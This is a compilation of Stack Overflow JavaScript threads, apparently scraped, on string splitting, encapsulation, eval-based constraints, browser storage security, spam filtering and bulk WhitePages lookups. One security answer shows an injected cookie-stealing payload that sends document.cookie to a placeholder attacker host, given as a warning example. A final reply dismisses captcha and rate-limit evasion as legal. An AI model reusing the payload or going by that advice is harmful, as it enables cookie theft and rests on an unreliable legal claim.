How to make an array from a string by newline in JavaScript? - javascript

I've got this:
var quoted_text = window.getSelection;
For example:
Accepting the Terms of Service
The Stack Exchange Network (the “Network”) is a set of related
Internet sites and other applications for questions and answers, owned
and operated by Stack Exchange Inc. (“Stack Exchange”), a Delaware
corporation. Please read these terms of service (“Agreement”)
carefully before using the Network or any services provided on the
Network (collectively, “Services”). By using or accessing the
Services, you agree to become bound by all the terms and conditions of
this Agreement. If you do not agree to all the terms and conditions of
this Agreement, do not use the Services. The Services are accessed by
You (“Subscriber” or “You”) under the following terms and conditions:
1. Access to the Services
Subject to the terms and conditions of this Agreement, Stack Exchange
may offer to provide the Services, as described more fully on the
Network, and which are selected by Subscriber, solely for Subscriber’s
own use, and not for the use or benefit of any third party. Services
shall include, but not be limited to, any services Stack Exchange
performs for Subscriber, as well as the offering of any Content (as
defined below) on the Network. Stack Exchange may change, suspend or
discontinue the Services at any time, including the availability of
any feature, database, or Content. Stack Exchange may also impose
limits on certain features and services or restrict Subscriber’s
access to parts or all of the Services without notice or liability.
Stack Exchange reserves the right, at its discretion, to modify these
Terms of Service at any time by posting revised Terms of Service on
the Network and by providing notice via e-mail, where possible, or on
the Network. Subscriber shall be responsible for reviewing and
becoming familiar with any such modifications. Use of the Services by
Subscriber following such modification constitutes Subscriber's
acceptance of the terms and conditions of this Agreement as modified.
How can i make in array from that text by newlines?
I need to paste in the begining of each line simbols "> ", how to do that?

Use split()
Fore example
str = "abc\ndef";
console.log(str.split("\n"));
will print out
["abc", "def"]

Use JavaScript .split() function to create an array with elements split by '\n'
and then manually iterate through that array and add '<' for each item. The following code may help :
var str="How\nare\nyou\ndoing\ntoday?";
var n = str.split("\n");
for(var x in n){
n[x]= '>'+n[x];
alert(n[x]);
}

Related

What does "Decoupling Implementation Details" mean regarding encapsulation in JavaScript?

I'm reading a blog post regarding encapsulation, after reading it I think I get what encapsulation is and why we need to use it, but at the end, the author talks about what are the advantages of encapsulation and he lists "Decoupling Implementation Details" as one of the benefits of using encapsulation.
I'm quoting it here:
Since Encapsulation enables operating on data using a public interface, it is easier to update the implementation because the tight coupling is eliminated. This is an excellent way to always code against an interface. This also means that with Encapsulation, the object is scalable to accommodate future changes without breaking compatibility.
The Coupling means the extent to which two modules are dependent on each other. Decoupling refers to eliminating such dependencies.
I'm trying to work this out in my head, and thought that maybe a SO member could help me understand what he is talking about. Can someone explain this to me?
Thanks in advance!
Encapsulation is a conscious decision to give your code - your implementation of some functionality - a particular interface, such that the consumer of your implementation only assume what they have to.
I'll start with a non-JS example, but will show one at the end.
Hostnames are an interface. IP addresses are implementation details.
When you go to Stack Overflow, you go to stackoverflow.com, you don't go to 151.101.193.69. And if you did go to 151.101.193.69, you'd notice that it's a Fastly CDN address, not a Stack Overflow address.
It's likely that when Stack Overflow just started, it implemented its web access using its own server, on a different IP address, say, for example, 198.51.100.253.
If everyone bookmarked 198.51.100.253, then when Stack Overflow started using Fastly CDN, suddenly everyone who bookmarked it - millions of people - would have to adjust.
That is a case of broken compatibility, because those millions of people would have been coupled to the IP address 198.51.100.253.
By encapsulating the IP address 198.51.100.253 - the actual detail of the implementation of web access - behind only the thing that users need to know - the name of the website - stackoverflow.com - the public interface, Stack Overflow was able to migrate to Fastly CDN, and all those millions of users were none the wiser.
This was possible because all these users were not coupled to the IP address 198.51.100.253, so when it changed to 151.101.193.69, nobody was affected.
This principle applies in many areas. Here are some examples:
Energy: You pay for electricity. The supplier can provide it using coal, gas, diesel, nuclear energy, hydro, they can change it from one to the other, and you're none the wiser, you're not coupled to hydro, because your interface is the electric socket, not a generator.
Business: When an office building gets cleaning company to keep the building clean, they only have a contract with the company; They cleaners get hired and fired, their salary changes, but that's all encapsulated by the cleaning company and does not affect the building.
Money: You don't need money, you need food and shelter and clothes. But those are implementation details. The interface you export to your employer is money, so they don't have to pay you in food, and if you change your diet or style, they don't have to adjust what food or clothes they buy you.
Engineering: When an office building gets HVAC, and it breaks, the owner just calls the HVAC company, they don't try to fix it themselves. If they did, they void the warranty, because the HVAC company can't guarantee good product if someone else touches the HVAC. Their public interface is the maintenance contract and the HVAC user-facing controls - you're not allowed to access the implementation directly.
And of course, software: Let's say you have a distributed key-value store which has the following client API:
client = kv.connect("endpoint.my.db");
bucket = crc(myKey)
nodeId = bucket % client.nodeCount();
myValue = client.get(nodeId, bucket, myKey);
This interface:
allows the caller to directly and easily find the node which will store the key.
allows the caller to cache bucket information to further save calls.
allows the caller to avoid extra calls to map a key to a bucket.
However, it leaks a ton of implementation details into the interface:
the existence of buckets
the usage of CRC to map keys to buckets
the bucket distribution and rebalancing strategy - the usage of bucket % nodeCount as the logic to map buckets to nodes
the fact that buckets are owned by individual nodes
And now the caller is coupled with all these implementation details. If the maintainer of the DB wants to make certain changes, they will break all existing users. Examples:
Use CRC32 instead of CRC, presumably because it's faster. This would cause existing code to use the wrong bucket and/or node, failing the queries.
Instead of round-robin buckets, allocate buckets based on storage nodes' free space, free CPU, free memory, etc. - that breaks bucket % client.nodeCount() - likewise leads to wrong bucket/node and fails queries.
Allow multiple nodes to own a bucket - requests will still go to a single node.
Change the rebalancing strategy - if a node goes down, then nodeCount goes from e.g. 3 to 2, so all the buckes have to be rebalanced such that bucket % client.nodeCount() finds the right node for that bucket.
Allow reading from any node instead of the bucket owner - requests will still go to a single node.
To decouple the caller from the implementation, you don't allow them to cache anything, save calls, or assume anything:
client = kv.connect("endpoint.my.db");
myValue = client.get(myKey);
The caller doesn't know about CRC, buckets, or even nodes.
Here, the client has to do extra work to figure out which node to send the request to. Perhaps with Zookeeper or using a gossip protocol.
With this interface:
Hashing logic e.g. CRC isn't hard-coded in the caller, it's on the server side and changing it won't break the caller.
Any bucket distribution strategy is likewise only on the server side.
Any rebalancing logic is likewise not in the client.
Even other changes are possible by just upgrading the client, but not changing any code in the caller:
Allow multiple nodes to own a bucket
Read from any node (e.g. choosing the one with the lowest latency).
Switching from a Zookeeper-based node finding infrastructure to a gossip-based one.
Let's take the Map class as an example. it has an API for adding key/value entries to the map, getting the value for a key, etc. You don't know the details of how the Map stores its key/value pairs, you just know that if you use set with a key, then later do get with the same key, you'll get back the value. The detail of the implementation are hidden from you, and largely don't matter to your code.¹ That's an example of how encapsulation decouples the API from the implementation details.
¹ You do know a little bit about the implementation in this specific example: The specification say "Maps must be implemented using either hash tables or other mechanisms that, on average, provide access times that are sublinear on the number of elements in the collection." So you know that a Map isn't implemented as (say) an array of key/value pairs, because that implementation wouldn't offer sublinear access times on the number of elements. But you don't know if it's a hash table or B-tree or what. Those are implementation details.

Build Notion like filter options as part of a configuration

To goal is to build a system that can configure some constraints. Similar to what Notion does with their filter properties.
System A configures the constraints and system C evaluates the constraints. Both use Typescript. However, the constraints are stored in a Rust environment (system B). This system should be modified as little as possible. So the data flow is:
System A (TS) -> System B (Rust) -> System C (TS)
System A and C know the the data structures but only system C knows about the actual values that are being evaluated. Thus, system A must define these constraints in an abstract way.
My best solution right now:
store these constraints as JS expressions in the form of strings. For example system A produces the following constraint:
const expression = "'${NAME}' === 'Zurich'"
System B can easily store this constraint without any necessary conversion since it is just a string.
System C takes the input that it received from the user and replaces it with the placeholder ${NAME} and can call the JS function eval() which can evaluate strings as JS code.
Questions:
What is the name of this problem so I can google it better? :) Is this sort of a query language?
Do you see a problem with the approach of storing strings and calling eval() on them?
Or any better ideas to achieve this?
Any libraries known that can help me with writing more complex constraints?
Background:
The real use case might help understand the problem better:
The system that is being built is a decentralized voting system.
System A is the voting authority and configures a ballat and who is allowed to vote.
This configuration is stored in a public ledger (System B)
System C is responsible to generate access tokens to eligible votes. A voter must reveal some proof. For example a passport signed by one of the eligible states (constraints). These constraints are read directly from the ballot configuration from the blockchain.
It's probably a little late for your needs, but for future searches, I think what you're looking for is curried functions. Someone answered a similar question over here much better than I could do here: https://stackoverflow.com/a/38719906/5656259

Web browser storage: Security implications of allowing user-supplied Strings to be evaluated?

I've almost finished developing a script that exposes an API that can be used to uniformly perform storage operations on any of the web browser storage technologies.
The last bits of functionality that I'm working on are conditional retrieval and removal operations, which (of course) require a conditional expression to be supplied that will be evaluated (either using eval() or, in the case of webSQL, inserted directly after WHERE).
I'd need at least two full-blown parsers(one for webSQL, one for indexedDB) to verify the input as valid, but after a security assessment it seems as though parsing the input, or even sanitizing it, is unecessary.
I'm a bit unsure of the security implications of evaluating raw strings, so I'd appreciate some input on my security assessment:
User:
Evaluating input supplied either directly or indirectly by a user
should be a non-issue due to the sanboxed nature of the storage
technologies (he/she'd be manipulating data accessible only to him/her
for a given origin), and the fact that nothing can be done with the
API that can't be done by the user directly in the browser.
Third-parties:
Storage technologies obey the same-origin policy, and thus, cannot
access the sandboxed storage areas belonging to other origins
I feel as though I've overlooked one or more possible security concerns in my assessment; is this the case? Or is the assessment (for the most part) correct?
The real revelant security question is where the condition strings comes from. As long as the strings always come from the user, there's no risk -- the user can eval anything directly from the JS console anyway. Once you allow the string to come from somewhere besides direct user input, you get into risky territory.
Suppose a site uses your API script in their code. Suppose also they let you save your favorite search conditionals. Suppose further that they let you share your list of favorite searches with other users. When you view a shared conditional, you are loading a string provided by another user.
Suppose one of your sends you a link to view his saved conditional:
foo==5; e=document.createElement(iframe); e.src='http://badsite.com/stealcookies?'+document.cookie;document.body.appendChild(e);
When you load the conditional into your data viewer, you've just exposed your cookie data to another website.
For WebSQL injection (as opposed to eval), the same kind of damage is possible, but limited to your data store, rather than your entire JavaScript execution environment.

What is the best way to filter spam with JavaScript?

I have recently been inspired to write spam filters in JavaScript, Greasemonkey-style, for several websites I use that are prone to spam (especially in comments). When considering my options about how to go about this, I realize I have several options, each with pros/cons. My goal for this question is to expand on this list I have created, and hopefully determine the best way of client-side spam filtering with JavaScript.
As for what makes a spam filter the "best", I would say these are the criteria:
Most accurate
Least vulnerable to attacks
Fastest
Most transparent
Also, please note that I am trying to filter content that already exists on websites that aren't mine, using Greasemonkey Userscripts. In other words, I can't prevent spam; I can only filter it.
Here is my attempt, so far, to compile a list of the various methods along with their shortcomings and benefits:
Rule-based filters:
What it does: "Grades" a message by assigning a point value to different criteria (i.e. all uppercase, all non-alphanumeric, etc.) Depending on the score, the message is discarded or kept.
Benefits:
Easy to implement
Mostly transparent
Shortcomings:
Transparent- it's usually easy to reverse engineer the code to discover the rules, and thereby craft messages which won't be picked up
Hard to balance point values (false positives)
Can be slow; multiple rules have to be executed on each message, a lot of times using regular expressions
In a client-side environment, server interaction or user interaction is required to update the rules
Bayesian filtering:
What it does: Analyzes word frequency (or trigram frequency) and compares it against the data it has been trained with.
Benefits:
No need to craft rules
Fast (relatively)
Tougher to reverse engineer
Shortcomings:
Requires training to be effective
Trained data must still be accessible to JavaScript; usually in the form of human-readable JSON, XML, or flat file
Data set can get pretty large
Poorly designed filters are easy to confuse with a good helping of common words to lower the spamacity rating
Words that haven't been seen before can't be accurately classified; sometimes resulting in incorrect classification of entire message
In a client-side environment, server interaction or user interaction is required to update the rules
Bayesian filtering- server-side:
What it does: Applies Bayesian filtering server side by submitting each message to a remote server for analysis.
Benefits:
All the benefits of regular Bayesian filtering
Training data is not revealed to users/reverse engineers
Shortcomings:
Heavy traffic
Still vulnerable to uncommon words
Still vulnerable to adding common words to decrease spamacity
The service itself may be abused
To train the classifier, it may be desirable to allow users to submit spam samples for training. Attackers may abuse this service
Blacklisting:
What it does: Applies a set of criteria to a message or some attribute of it. If one or more (or a specific number of) criteria match, the message is rejected. A lot like rule-based filtering, so see its description for details.
CAPTCHAs, and the like:
Not feasible for this type of application. I am trying to apply these methods to sites that already exist. Greasemonkey will be used to do this; I can't start requiring CAPTCHAs in places that they weren't before someone installed my script.
Can anyone help me fill in the blanks? Thank you,
There is no "best" way, especially for all users or all situations.
Keep it simple:
Have the GM script initially hide all comments that contain links and maybe universally bad words (F*ck, Presbyterian, etc.). ;)
Then the script contacts your server and lets the server judge each comment by X criteria (more on that, below).
Show or hide comments based on the server response. In the event of a timeout, show or reveal based on a user preference setting ("What to do when the filter server is down? (show/hide comments with links) ).
That's it for the GM script; the rest is handled by the server.
As for the actual server/filtering criteria...
Most important is do not dare to assume that you can guess what a user will want filtered! This will vary wildly from person to person, or even mood to mood.
Setup the server to use a combination of bad words, bad link destinations (.ru and .cn domains, for example) and public spam-filtering services.
The most important thing is to offer users some way to choose and ideally adjust what is applied, for them.

I want to query whitepages.com 4,000 times, how to save the results?

I have an old customer list of 4,000 businesses. I want to determine if the phone numbers associated with each listing are still working (and therefore the business is probably still open).
I can put each number in whitepages.com and check them one by one... but want to automate the results. I have looked at their API and can't digest it. I can form the correct query URL, but trying things like cURL -O doesn't work.
I have access to Mac tools, Unix tools, and could try various javascript stuff if anyone could point me in the right direction... would even pay. Help?
Thx
As per Pekka's comment, most companies with a public API don't allow scraping in their terms of service, so it's quite possible that performing 4k GET requests to their website will flag you as a malicious user and get you blacklisted!
Their API is RESTful and seems simple and pretty well documented, definitely try to get that working instead of going the other way. A good first attempt after getting your API key would be to write a UNIX script to perform a reverse phone number lookup. For example, suppose you had all 4000 10-digit phone numbers in a flat text file, one per line with no formatting, you could write a simple bash script as follows:
#!/bin/bash
INPUT_FILE=phone_numbers.txt
OUTPUT_DIR=output
API_KEY='MyWhitePages.comApiKey'
BASE_URL='http://api.whitepages.com'
# Perform a reverse lookup on each phone number in the input file.
for PHONE in $(cat $INPUT_FILE); do
URL="${BASE_URL}/reverse_phone/1.0/?phone=${PHONE};api_key=${API_KEY}"
curl $URL > "${OUTPUT}/result-${PHONE}.xml"
done
Once you've retrieved all the results you can either parse the XML to analyze the matching businesses, or if you're just interested in existence you could simply grep each output file for the string The search did not find results which, from the WhitePages.com API, indicates no match. If the grep succeeds then the business doesn't exist (or changed its phone number), otherwise it's probably still around (or another business exists with that phone number).
As others have noted, it is a tos violation to scrape our website or to store the data returned from the api. However, you can get the data you want from our pro service at:
https://pro.whitepages.com/list-update/upload_file
Dan
Whitepages API lead.
you can scrape the website. they have limits if you keep coming from the same ip, plus captcha. it's easy enough to get around if you know what you're doing. also, while it might violate the TOS, it's certainly not illegal. You can't copyright phone numbers and addresses says the law, so you don't have much to worry about.

Categories

Resources